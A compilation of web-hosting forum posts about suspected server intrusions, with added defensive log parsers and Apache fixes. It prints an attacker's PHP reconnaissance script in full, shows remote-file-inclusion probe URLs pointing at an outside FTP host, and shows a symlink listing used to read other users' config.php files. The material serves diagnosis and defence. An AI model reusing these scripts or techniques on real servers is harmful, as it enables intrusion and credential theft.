Is It A Hacking Attempt? Request Of Weird Files Along With Unwanted SSL Handshake
Mar 30, 2009
I see the following errors in my server's httpd error logs:
Code:
[Mon Mar 30 07:23:55 2009] [error] mod_ssl: SSL handshake failed (server localhost:443, client 79.132.204.192) (OpenSSL library error follows)
[Mon Mar 30 07:23:55 2009] [error] OpenSSL: error:1408F455:SSL routines:SSL3_GET_RECORD:decryption failed or bad record mac
[Mon Mar 30 07:23:55 2009] [error] mod_ssl: SSL handshake failed (server localhost:443, client 60.63.241.18) (OpenSSL library error follows)
[Mon Mar 30 07:23:55 2009] [error] OpenSSL: error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol [Hint: speaking not SSL to HTTPS port!?]
[Mon Mar 30 07:23:56 2009] [error] [client 114.224.169.0] File does not exist: /var/www/html/XRkVCfvCJ/GzTk/ChDbhf/-YSDDv/1Sch/2hfMMf/-M0DO/ACDEzXMEM/CYSkGFj/SGXtEUX0W/0KMV/RKJ2fTUDC/bFT/SX00/VtJVht/D1XvJBgHP/5lll.gif
[Mon Mar 30 08:46:42 2009] [error] server reached MaxClients setting, consider raising the MaxClients setting
In the last line you can see that MySQL reached the maximum allowed clients, and it crashed.
Also, at regular intervals I see such requests:
/var/www/html/XRkVCfvCJ/GzTk/ChDbhf/-YSDDv/1Sch/2hfMMf/-M0DO/ACDEzXMEM/CYSkGFj/SGXtEUX0W/0KMV/RKJ2fTUDC/bF/SX00/VtJVht/D1XvJBgHP/5lll.gif
Also, I see SSL handshake failure notices, although I do not have any SSL cert or SSL-enabled site on this server.
Feb 22, 2007
In the referral logs that I keep on a website, I came across the following this morning. Is this someone who is trying to gain access to the server?
[url]
[url]
[url]
[url]
[url]
I have the IP addresses that they have come from, and they resolve to a Russian (I think) website.
I'm just looking through all the folders on the server now, and no data has been compromised as far as I can see. I'm going to use the query strings to block access and also deny access by IP address.
Sep 13, 2007
See the log entries below:
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" \"%{X-Forwarded-For}i\""
1.2.3.4 - - [12/Sep/2007:11:15:38 +0900] "GET /~kjm/security/ml-archive/bugtraq/2006.04/msg00283.html//footer.inc.php?settings[footer]=[url] HTTP/1.1" 404 268 "-" "libwww-perl/5.808" "-"
1.2.3.4 - - [12/Sep/2007:11:16:00 +0900] "GET //footer.inc.php?settings[footer]=[url] HTTP/1.1" 404 213 "-" "libwww-perl/5.808" "-"
What can you say from the above log entries?
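Those two lines are the classic remote-file-inclusion probe: a script name (footer.inc.php) with a query parameter whose value is itself a URL, sent by a scripted client (libwww-perl) and answered with 404 because the script is not on this host. The following detector is an added example, not code from the post; it parses the LogFormat quoted above and flags that pattern. The sample lines are constructed from the post, with 198.51.100.7 standing in for the include URL the forum replaced with [url].

```python
import re

# Matches the LogFormat quoted in the post: the combined format plus X-Forwarded-For.
LOG_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) ?\[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)" "(?P<xff>[^"]*)"$'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    fields = m.groupdict()
    parts = fields["request"].split(" ")
    fields["method"] = parts[0]
    fields["path"] = parts[1] if len(parts) > 1 else ""
    return fields

def remote_url_params(path):
    """Names of query parameters whose value is itself a URL: the RFI signature."""
    query = path.partition("?")[2]
    names = []
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if value.lower().startswith(REMOTE_SCHEMES):
            names.append(name)
    return names

def classify(line):
    """Findings for one line; an empty list means nothing suspicious was seen."""
    fields = parse_line(line)
    if fields is None:
        return ["unparsed line"]
    findings = []
    names = remote_url_params(fields["path"])
    if names:
        findings.append("remote URL passed in query parameter(s): " + ", ".join(names))
    if fields["agent"].startswith("libwww-perl"):
        findings.append("scripted client: " + fields["agent"])
    if findings and fields["status"] == "404":
        findings.append("target script absent (404): the probe failed on this host")
    return findings

# Constructed sample lines modelled on the post; 198.51.100.7 is a placeholder for the
# include URL the forum software replaced with [url].
SAMPLE_LINES = [
    '1.2.3.4 - - [12/Sep/2007:11:15:38 +0900] "GET /~kjm/security/ml-archive/bugtraq/'
    '2006.04/msg00283.html//footer.inc.php?settings[footer]=http://198.51.100.7/x.txt? '
    'HTTP/1.1" 404 268 "-" "libwww-perl/5.808" "-"',
    '1.2.3.4 - - [12/Sep/2007:11:16:00 +0900] "GET //footer.inc.php?settings[footer]='
    'http://198.51.100.7/x.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.808" "-"',
    '203.0.113.9 - - [12/Sep/2007:11:20:00 +0900] "GET /index.html HTTP/1.1" 200 1024 '
    '"-" "Mozilla/5.0" "-"',
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(parse_line(line)["host"], "->", "; ".join(classify(line)) or "clean")
```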
Jul 20, 2008
I am having an issue with my server. Someone is trying to execute some code and possibly trying a MySQL injection method.
I have pasted the code below.
Please suggest what can be done in this case.
Regards
Gagandeep
+++++++++++
The person tried to use different IPs and different websites to execute the code.
URL >> IP
[url]
[url]
[url]
ftp://212.11.127.86/tmp/trem/1? >> 87.118.118.156
There are many such queries under my logs.
The person is using different IPs, so I can't even block that many IPs.
++++++++++++
The CODE
<?php
// Reconnaissance script found on the server: it reports the host, the web server's
// user, and disk usage back to whoever requested it, then exits.
function ConvertBytes($number) {
    $len = strlen($number);
    if ($len < 4) {
        return sprintf("%d b", $number);
    }
    if ($len >= 4 && $len <= 6) {
        return sprintf("%0.2f Kb", $number / 1024);
    }
    if ($len >= 7 && $len <= 9) {
        return sprintf("%0.2f Mb", $number / 1024 / 1024);
    }
    return sprintf("%0.2f Gb", $number / 1024 / 1024 / 1024);
}
echo "Osirys<br>";
$un = @php_uname();              // kernel and OS banner
$id1 = system('id');             // runs `id` to learn the uid/gid PHP executes as
$pwd1 = @getcwd();
$free1 = diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) { $free = 0; }
$all1 = disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) { $all = 0; }
$used = ConvertBytes($all1 - $free1);
$os = @PHP_OS;
echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
?>
May 26, 2008
How do I perform the following?
- Clean up unwanted files from /tmp
- Check and clean the mail queue
- Check /proc for hidden or unwanted processes
I will be thankful to the person who can explain in detail how to perform each point on a VPS server and what steps or commands I should follow.
Apr 19, 2008
I have worked with mod_rewrite for years and never encountered this problem. I am converting HTML pages to a single PHP file and it works perfectly. I used .htaccess to rewrite the URLs to appear the same so that no links would be broken or lose SEO value.
The only problem is that my friend who also helped build the sites added different directories and within those directories are index.htm files that serve as a home page for the separate directory. Like /info/index.htm and /help/index.htm within the root directory. The problem is that for some reason my mod_rewrite directs to the main index.htm rewrite even if I include the whole path to the file. In htaccess I have this so far:
RewriteEngine on
RewriteRule index.htm$ index.php [L]
RewriteRule servers.htm$ index.php?action=servers [L]
RewriteRule movies.htm$ index.php?action=movies [L]
However there is a directory named "info" and inside that directory it has an index.htm file and it seems to conflict with my first mod_rewrite. I tried using:
RewriteRule /info/index.htm$ index.php?action=info [L]
and used other methods, but none seem to work. Any ideas?
Sep 17, 2014
I have a 6GB backup file created with another Plesk Backup Manager. Now I am trying to upload this backup file to my Plesk Backup Manager, but after uploading 3% I get a "413 Request Entity Too Large" error. I tried disabling NGINX but still get this error.
How can I resolve this error, or is there any other way to upload my file to the backup manager?
I see that Backup Manager has a file size restriction of 2GB; how can I increase this?
Dec 4, 2008
I have multiple demo websites under a single domain, and in each folder the default page is index.html.
A few days back I observed a blank space on each index.html. When I checked the code I found an auto-generated snippet just after the body tag in index.html. The code is as follows:
<div style="visibility:hidden"><iframe src="[url]
Also, I am getting question marks (?) in some blank spaces in the HTML preview.
I have removed it, but it appears again after some time. I have contacted server support, but they said that this is a SQL injection attack; however, there is no database connectivity involved in any of my websites.
Oct 22, 2007
I have a folder with chmod 777. It needs to be writable so that legitimate users can upload their pictures. However, I do not want people to upload .php or .php.jpeg etc. to the server.
There are times when they do not use the form on my site to upload the PHP file. How can they do that? Via a Perl command? And how do I prevent such a thing from happening?
Mar 19, 2008
Every email which gets automatically sent out from my server begins with:
Reply-To: noreply@MYDOMAIN.com
X-Mailer: PHP/4.4.7
Message-Id: <20080319210750.564111CEC004@mx.MYDOMAIN.com>
Date: Wed, 19 Mar 2008 22:07:50 +0100 (CET)
Dear DOMAIN.com Member,
This is not in our PHP code or anything, and I can't seem to remove it; it's just a tad annoying. How do I remove it?
Apr 11, 2007
Yesterday I upgraded PHP 4.4.6 to 5.x, then checked all my scripts/pages and everything was fine.
Today I upgraded MySQL 4 to 5 and recompiled PHP. Scripts are working fine, but all my Russian language pages are broken; I mean plain PHP pages, not those that depend on scripts.
It's weird: when I open them in Firefox they open with Win1251 encoding as expected, but when I open them in IE they open with KOI8 encoding and I have to manually change the encoding to Win1251 to view the pages.
This has been confirmed by other users.
Apr 11, 2007
Today I checked my server, and when I click on Install a RPM it shows an empty list!
I tried to rebuild the RPM database; it rebuilt without any error, but the list is still empty?
Any idea?
Also, when I click on Apache Build/Upgrade I see this:
[a fatal error or timeout occurred while processing this directive] There was an error while fetching [url]
Mar 3, 2007
I've just been having a look through my logwatch e-mail, and have seen the following that I've not seen before:
Code:
A total of 3 unidentified 'other' records logged
GET http:/ /74.52.21.101/index.php2?goto=[url]
HTTP/1.0 with response code(s) 2 404 responses
GET http:/ /74.52.21.100/index.php2?goto=[url]
HTTP/1.0 with response code(s) 2 404 responses
GET http:/ /74.52.21.102/index.php2?goto=[url]
HTTP/1.0 with response code(s) 2 404 responses
NB. I've added a space in the URL to break the link.
What is happening here? This looks to be something dodgy.
May 25, 2007
A client is running a Server 2003 box with a couple of game servers. Unfortunately I'm noticing that something isn't quite right with some of the pings on the server (at times). I pinged localhost; look at these results.
C:\Documents and Settings\Administrator>ping 127.0.0.1
Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time=-987ms TTL=128
Reply from 127.0.0.1: bytes=32 time=-987ms TTL=128
Reply from 127.0.0.1: bytes=32 time=-987ms TTL=128
Reply from 127.0.0.1: bytes=32 time=-987ms TTL=128
Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = -987ms, Maximum = -987ms, Average = 1073740837ms
Sound like a driver issue to anyone?
Apr 11, 2008
I get this message:
mysite.com has sent an incorrect or unexpected message. Error Code: -12263
Any idea what that means and how to fix it?
Feb 7, 2007
Our company currently has colo in NY, UK and Geneva and has recently started to rent some space in an Australian datacentre.
In each of our existing centres we have a /26 range of IP addresses assigned to us (62 usable IPs) and we requested the same for our Australian installation.
The colo company emailed us today with our IP range allocation, and they seem to have chosen to allocate us 12 separate /29 ranges (6 usable IPs).
This seems really strange to me; is it normal practice? Why not just assign us one /26 as requested?
Also, our WatchGuard firewalls only accept one range in the configuration, and then you add in all of the IP aliases separately. If I set the IP range to be bigger than the range we own (to cover all 12 separate ranges we've been issued), would this cause problems for the people that own the other IPs in this large range?
Mar 19, 2008
I have reported this to BurstNET admin/abuse/NOC and have added a line to block them for now.
Does this belong to anyone? Nslookup/dig reveals nothing.
This is my /var/log/messages:
Mar 19 19:24:50 ginger sshd[11565]: Failed password for root from 66.197.245.241 port 46346 ssh2
Mar 19 19:24:50 ginger sshd[11565]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:51 ginger sshd[11567]: Failed password for root from 66.197.245.241 port 46407 ssh2
Mar 19 19:24:52 ginger sshd[11567]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:53 ginger sshd[11569]: Failed password for root from 66.197.245.241 port 46468 ssh2
Mar 19 19:24:53 ginger sshd[11569]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:55 ginger sshd[11571]: Failed password for root from 66.197.245.241 port 46531 ssh2
Mar 19 19:24:55 ginger sshd[11571]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:57 ginger sshd[11573]: Failed password for root from 66.197.245.241 port 46584 ssh2
Mar 19 19:24:57 ginger sshd[11573]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
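Five root failures in seven seconds from one address is a password-guessing run, and the "reverse mapping" line just means the PTR record does not resolve back to the same address. The following script is an added example, not part of the post or any tool it mentions; it groups sshd failures by source address and flags any address that crosses a threshold inside a time window (the logic fail2ban-style tools apply). The sample log reuses the failure lines from the post (only one reverse-mapping warning kept) plus one constructed failure from 203.0.113.5 that should stay below the threshold.

```python
import re
from collections import defaultdict
from datetime import datetime

# sshd's failure line as it appears in /var/log/messages; the syslog stamp has no year.
FAILED_RE = re.compile(
    r'^(?P<stamp>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: '
    r'Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$'
)
REVERSE_RE = re.compile(r'sshd\[\d+\]: reverse mapping checking getaddrinfo for \S+ failed')

def parse_stamp(stamp, year):
    """Syslog stamps carry no year, so the caller supplies the one the log was written in."""
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")

def collect_failures(lines, year):
    """Group failed-password events by source address."""
    by_ip = defaultdict(lambda: {"times": [], "users": set(), "reverse_failed": False})
    last_ip = None
    for line in lines:
        m = FAILED_RE.match(line.strip())
        if m:
            rec = by_ip[m["ip"]]
            rec["times"].append(parse_stamp(m["stamp"], year))
            rec["users"].add(m["user"])
            last_ip = m["ip"]
        elif last_ip and REVERSE_RE.search(line):
            # sshd logs the reverse-mapping warning right after the failure it belongs to.
            by_ip[last_ip]["reverse_failed"] = True
    return by_ip

def brute_force_sources(lines, year, threshold=5, window_seconds=60):
    """Return {ip: summary} for addresses with >= threshold failures inside one window."""
    flagged = {}
    for ip, rec in collect_failures(lines, year).items():
        times = sorted(rec["times"])
        # Sliding window: the i-th attempt and the (i + threshold - 1)-th must be close.
        for i in range(len(times) - threshold + 1):
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window_seconds:
                flagged[ip] = {
                    "attempts": len(times),
                    "users": sorted(rec["users"]),
                    "first": times[0].isoformat(),
                    "last": times[-1].isoformat(),
                    "reverse_dns_mismatch": rec["reverse_failed"],
                }
                break
    return flagged

# The five failures quoted in the post (one reverse-mapping warning kept), plus one
# constructed single failure from 203.0.113.5 that should not be flagged.
SAMPLE_LOG = """\
Mar 19 19:24:50 ginger sshd[11565]: Failed password for root from 66.197.245.241 port 46346 ssh2
Mar 19 19:24:50 ginger sshd[11565]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:51 ginger sshd[11567]: Failed password for root from 66.197.245.241 port 46407 ssh2
Mar 19 19:24:53 ginger sshd[11569]: Failed password for root from 66.197.245.241 port 46468 ssh2
Mar 19 19:24:55 ginger sshd[11571]: Failed password for root from 66.197.245.241 port 46531 ssh2
Mar 19 19:24:57 ginger sshd[11573]: Failed password for root from 66.197.245.241 port 46584 ssh2
Mar 19 19:30:02 ginger sshd[11600]: Failed password for invalid user admin from 203.0.113.5 port 51000 ssh2
""".splitlines()

if __name__ == "__main__":
    for ip, summary in brute_force_sources(SAMPLE_LOG, year=2008).items():
        print(ip, summary)
```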
Jan 31, 2007
I have started seeing the following error in the Event Viewer every day:
"An anonymous session connected from xxx.xxx.xxx.xxx has attempted to open an LSA policy handle on this machine. The attempt was rejected with STATUS_ACCESS_DENIED to prevent leaking security sensitive information to the anonymous caller. The application that made this attempt needs to be fixed. Please contact the application vendor. As a temporary workaround, this security measure can be disabled by setting the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\TurnOffAnonymousBlock DWORD value to 1. This message will be logged at most once a day."
The IP address is different every time. It is not an internal IP address or any I recognize; it is from the outside. I have read about this on the Microsoft site, but it only mentioned how it might be an internal service/application attempting the access. This is not my case, since I am seeing remote IP addresses. Can anyone help me dig deeper into this? How can I find out more about what's going on?
May 30, 2007
Usually I just block offending machines that try to get into our systems and move on, but for the last 2 days I have started notifying the contacts in the ARIN info for offending IPs. I guess I am trying to do my part to make the internet a better place?
Is this stuff largely ignored?
Is anyone else doing this?
Is there an easier way?
Jul 8, 2007
A new client has just opened up an account, and the first thing he's installed is a few scripts called r57shell and c99shell. I'm not very familiar with these two scripts, but by the looks of them they're root kits of some sort. Am I correct in thinking this?
The account has been suspended for the time being.
May 7, 2009
Today I have had a lot of hacking on my server.
I searched for shell scripts on the server, and I found a lot of them:
[root@host svt]# ls -l
total 48
-rw-r--r-- 1 koky koky 6700 May 7 08:14 s.php
lrwxrwxrwx 1 koky koky 48 May 7 08:07 s1 -> /home/user1/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 47 May 7 08:12 s2 -> /home/user2/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 48 May 7 08:19 s3 -> /home/user3/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 47 May 7 08:37 s5 -> /home/user4/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 49 May 7 08:49 s6 -> /home/user5/public_html/vb/includes/config.php
-rw-r--r-- 1 koky koky 13199 May 7 07:59 ss.php
-rwxr-xr-x 1 koky koky 23005 May 7 07:58 svt.svt
As you can see, he uploaded the files on this account "koky" and redirected these files to the user1, user2, user3, user4 and user5 accounts.
And he could read the config.php and then hacked the site easily!!
I read before that the reason for this is Perl on the server, and the way to solve it is to edit httpd.conf by adding this in it:
<Directory "/home">
Options -ExecCGI -FollowSymLinks
AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch
</Directory>
and then restart httpd:
service httpd restart
I did all of that, and when I restarted httpd it said:
[root@host www]# service httpd restart
Syntax error on line 51 of /usr/local/apache/conf/httpd.conf:
Invalid command 'Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch', perhaps misspelled or defined by a module not included in the server configuration
and all the sites went down!
I deleted:
<Directory "/home">
Options -ExecCGI -FollowSymLinks
AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch
</Directory>
from httpd.conf, and then the sites worked correctly.
So you all know my problem now! And I think a lot of you have the same problem, so I wish we would all try to find a solution for this and learn the best way to protect Perl on the server.
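The "Invalid command" error comes from the `Options=...` list on the AllowOverride line: that form of AllowOverride exists only in Apache 2.2 and later, and the httpd that rejected it does not understand it, so the server treated the whole token as an unknown directive. The two blocks below are an added example (not from the post) showing the same intent written for each generation of Apache; the point of both is that the symlinks listed in the `ls -l` output only work if httpd follows them across user boundaries, which `SymLinksIfOwnerMatch` stops.

```apache
# Added example, not from the post. Goal: stop httpd from following a symlink that one
# user planted pointing at another user's config.php, without leaving .htaccess a way
# to switch symlink following back on.

# Apache 2.2 or later: the list after Options= limits which options .htaccess may set,
# so FollowSymLinks cannot be re-enabled per directory.
<Directory "/home">
    Options -ExecCGI -FollowSymLinks +SymLinksIfOwnerMatch
    AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch
</Directory>

# Apache 2.0 or 1.3 (what the "Invalid command" error indicates): AllowOverride only
# accepts bare group names, so withhold the Options group entirely; granting plain
# "Options" here would let any .htaccess set Options +FollowSymLinks and undo the fix.
<Directory "/home">
    Options -ExecCGI -FollowSymLinks +SymLinksIfOwnerMatch
    AllowOverride AuthConfig Indexes Limit FileInfo
</Directory>
```

Run `httpd -t` (or `apachectl configtest`) after editing and before `service httpd restart`, so a syntax error is reported without taking every site down.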
Jun 9, 2009
I have not been able to log in to my cPanel from my desktop, which runs WinXP Service Pack 3. Both Firefox and Internet Explorer return the following error message:
Login Attempt Failed!
Also, I am unable to connect using FileZilla Client.
However, I am able to connect to the same cPanel on my colleague's desktop, which runs WinXP Service Pack 3, using the Firefox browser or IE. We both share the same internet modem.
- I have cleared all the cookies and private data on my desktop. Still the problem persists.
- I changed to a different user on my desktop, but still could not login.
- I changed my desktop IP address but still I could not log in.
I use DSLinux from within Innotek VirtualBox, and I was able to log in to the same cPanel with the same details that were rejected under WinXP.
Could anyone with a solution please advise me on what to do? Thanks in advance.
It is not convenient going to my colleague's desk to access my cPanel.
May 18, 2009
Code:
Mon May 18 15:17:08 2009 lfd: *Suspicious File* /tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan [someuser:someuser] - Suspicious directory
The 'someuser' is a legitimate user on the server, an auto body website set up last October.
The content of the directory:
Quote:
root@server [/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/CPAN]# ls -lh
total 3.0K
drwx------ 2 someuser someuser 1.0K May 16 17:54 ./
drwx------ 3 someuser someuser 1.0K May 16 17:54 ../
-rw-r--r-- 1 someuser someuser 361 May 16 17:54 MyConfig.pm
File content:
Code:
$CPAN::Config->{'cpan_home'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan";
$CPAN::Config->{'build_dir'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/build";
$CPAN::Config->{'histfile'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/histfile";
$CPAN::Config->{'keep_source_where'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/sources";
1;
__END__
Code:
root@server [/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpcpan/STABLE]# ls -lh
total 3.0K
drwx------ 2 someuser someuser 1.0K May 16 17:54 ./
drwx------ 3 someuser someuser 1.0K May 16 17:54 ../
-rw-r--r-- 1 someuser someuser 735 May 16 17:54 modules.versions
Jun 24, 2008
I had an untapped image upload site on my server which I forgot about. Some guys or children uploaded something noxious and neutralized all the "index.php" files. This was a hack attempt via SSH.
We noticed that, closed this account and deleted the uploaded files. But there is a quirky problem: none of the index.php files work after this attempt. The index file works after changing its name, for example to "mindex.php".
We updated all the services and rebuilt Apache, but it's not working. We can't use any index.php on the server.
Additionally, there are 34 possible trojans appearing on the server. I tried to delete them with BitDefender but can't do that. (I checked that in WHM / Scan for Trojan Horses.)
Apr 12, 2008
Whenever I attempt to install RoR, libsafe stops me. How do I disable libsafe so I can install RoR, then re-enable libsafe?
[root@server1 ~]# gem install rails --include-dependencies
Libsafe version 2.0.16
Detected an attempt to write across stack boundary.
Terminating /usr/bin/ruby-bin.
uid=0 euid=0 pid=20960
Call stack:
0x4c0e6871 /lib/libsafe.so.2.0.16
0x4c0e6c5d /lib/libsafe.so.2.0.16
0x80549b8 /usr/bin/ruby-bin
0x8054a52 /usr/bin/ruby-bin
0x80556af /usr/bin/ruby-bin .....
Jun 4, 2008
One of my clients seems to be attracting unwanted attention; it seems as if bots or something along those lines are attempting to exploit my box, though they are unsuccessful, it would seem. I was wondering if there was a rule I could put in mod_security that would ban them for attempting to
GET "/awstatsf/logger.php?action=log&type=Hybrid&host=hacked101&"
Feb 6, 2009
A site I manage for a client is being hacked every couple of days. It's not the actual site but the host's server that's getting attacked: all sites on that server, well, actually all their servers.
They have made no attempt to sort this problem; I report it, they look at the site and say "site loads fine for us", which it does.
All index files are having a base64-encoded line written after the <body> tag; this adds hundreds of spam links which are hidden with display:none. They also add .html to the application types in .htaccess so PHP runs in these files too.
The problem is, I am moving the site to another host but cannot change the nameservers to the new host's until the client returns from a holiday, so I must keep the site up on the insecure host for now.
I am removing the spam code almost daily. Is there any way I can stop this attack from happening for the time being, since the host does nothing?
Jun 8, 2009
As we all know, there has been a HyperVM exploit which may have taken down fsckvps, and other hosts have been having attacks. If possible, install any program that will warn you of a connection to your server and/or provide input on what it may or may not be.
I myself just had a blank PHP format file uploaded to a client's VPS, and it tried accessing other VPS servers. As far as I know the IP was rapidly changing and untraceable (this may or may not be from the exploit). If anyone else is having HyperVM attacks or server attacks, please post here so that instead of working within our own companies we are working as a group of over 10 thousand+ WHT members to solve this issue ourselves.
(mods may move this wherever)
Jan 15, 2008
I have a server, and these days my server is being hacked by a hacker. The problem is chmod 777: there are many dirs with chmod 777, and the hacker is uploading files and creating folders under the folder which is created with chmod 777. Now I just want to know how I can block the hacker, and is there any way to allow the scripts which are on my server and not allow any other scripts to upload files to my server?
I have a Linux server.
Jun 27, 2007
A lot of databases on my server were hacked.
The hacker can edit tables.
Are there any ports in MySQL4?